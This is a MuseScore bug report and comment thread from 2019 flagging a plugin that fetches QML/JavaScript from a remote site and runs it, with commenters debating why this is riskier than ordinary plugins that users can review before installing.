Dangerous remote code loading

• Aug 28, 2019 - 15:50
Reported version
3.2
Priority
P0 - Critical
Type
Functional
Frequency
Once
Severity
S2 - Critical
Reproducibility
Always
Status
active
Regression
No
Workaround
No

Look at the plugin code: this plugin does nothing more than load QML/JavaScript code from a remote site and then call an entry function in this code. While the code currently downloaded seems harmless this remote code execution opens up a local MuseScore instance to all sorts of exploits (and why would you need to download code from a remote site instead of deploying it with the plugin file?).
The overall look of the musicalion website makes that whole procerdure even more dubious - no impressum, no contact, no DSVG-required information.


Comments

A plugin only works if you manually add the plugin to begin with, right?
And when you do so, the plugin comes from Internet ?
So for any plugin running it "runs code from Internet"...
Ok if the plugin doesn't life download codes, it is a code that you can review before using it.
But which "normal" user does that?
So aren't all plugins "dangerous code from Internet"?

You can inspect the plugin god prior to installed and running it, you can't with this one. Even if you can now, via that URL above, the code sent from there might change any minute (and already might, depending on the current date, as that is passed as an argument to the server)